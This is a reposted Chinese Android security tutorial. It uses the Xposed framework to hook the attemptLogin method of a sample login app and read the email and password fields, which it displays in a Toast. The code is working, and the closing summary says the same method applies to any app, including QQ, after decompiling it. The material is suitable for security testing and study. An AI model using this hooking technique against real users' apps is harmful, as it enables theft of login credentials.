Android安全专项之Xposed劫持用户名密码实践

作者：网友字体：[增加减小] 来源：互联网时间：2017-05-26

网友通过本文主要向大家介绍了android 7.0 xposed,android xposed,android 7 xposed,myandroidtoolsxposed,xposed框架android7.0等相关知识,希望对您有所帮助,也希望大家支持linkedu.com www.linkedu.com

Android安全专项之Xposed劫持用户名密码实践

Xposed是个强大的工具，可以hook所有的java方法，下面用Xposed来截获App的用户名密码，默认你已经安装好Xposed环境了
AS中创建带有Login界面的项目

这里写图片描述

然后一路Next，创建成功后，运行，App界面如下：<喎?http://www.Bkjia.com/kf/ware/vc/" target="_blank" class="keylink">vcD4NCjxwPjxpbWcgYWx0PQ=="这里写图片描述" src="http://www.bkjia.com/uploads/allimg/160311/041H955X-1.png" title="\" />

为了使用Xposed劫持应用的用户名和密码，我们需要知道该应用的包名和要hook的方法,我们只要找到点击SIGN IN OR REGISTER按钮的点击事件处理方法，只要hook这个方法，我们就能获取到输入框中的信息。

包名：xposed.doctorq.com.qq4xposed hook的方法：xposed.doctorq.com.qq4xposed.LoginActivity.attemptLogin

在hook的beforeHookedMethod方法中获取下面两个属性的值：

这里写图片描述

Xposed Module

Xposed Module称为Xposed插件，利用Xposed进行实际劫持的项目。

我们创建一个不带界面的Android项目，创建一个类，实现IXposedHookLoadPackage:

public class LoginHook implements IXposedHookLoadPackage{

    @Override
    public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) throws Throwable {

        if(!loadPackageParam.packageName.equals("xposed.doctorq.com.qq4xposed")) return;


        findAndHookMethod("xposed.doctorq.com.qq4xposed.LoginActivity", loadPackageParam.classLoader, "attemptLogin", new XC_MethodHook() {
            @Override
            protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                XposedBridge.log("已经HOOK");
                Class o = param.thisObject.getClass();

                XposedBridge.log(o.getName());
                Field.setAccessible(o.getDeclaredFields(), true);

                Field fieldEmail = findField(o, "mEmailView");
                Field fieldPassword = findField(o,"mPasswordView");
                AutoCompleteTextView autoTextView = (AutoCompleteTextView)fieldEmail.get(param.thisObject);
                EditText editText = (EditText)fieldPassword.get(param.thisObject);
                String email = autoTextView.getText().toString();
                String password = editText.getText().toString();
                Toast.makeText((Activity)param.thisObject,"邮箱: " + email + ",密码 : " + password,Toast.LENGTH_LONG).show();
            }

            @Override
            protected void afterHookedMethod(MethodHookParam param) throws Throwable {

            }
        });

    }
}

将xposed_init文件修改如下：

这里写图片描述

安装该应用，在Xposed Installer中勾选，重启生效，操作之前的App,正常输入邮箱和密码:

这里写图片描述

总结

使用Xposed进行hook的时候，难点不是如何使用Xposed，而是如何找到要被hook的方法，比如你如何hook QQ登录方法，这就需要反编译QQ的Apk找到登录入口，要是学会这一点，随便一个App你都能Hook。

</div> </div>

分享到：QQ空间新浪微博腾讯微博微信百度贴吧 QQ好友复制网址打印

您可能想查找下面的文章:

Android安全专项之Xposed劫持用户名密码实践

2017-05-26Android MVP 设计模式，androidmvp
2017-05-26[AndroidAnnotations框架]AndroidAnnotations的配置介绍
2017-05-26高并发低基数多字段任意组合查询的优化
2017-05-26Spark的调度策略详解
2017-05-26Android 手机卫士1--实现splash页面，androidsplash
2017-05-26常用的adb命令，常用adb命令
2017-05-26Android实现一个自定义相机的界面
2017-05-26安卓四大组件之广播，安卓四大组件
2017-05-26安卓高级组件-----自动编辑文本框，安卓-----文本框
2017-05-26Android UI学习笔记之使用ViewPager实现导航

Android安全专项之Xposed劫持用户名密码实践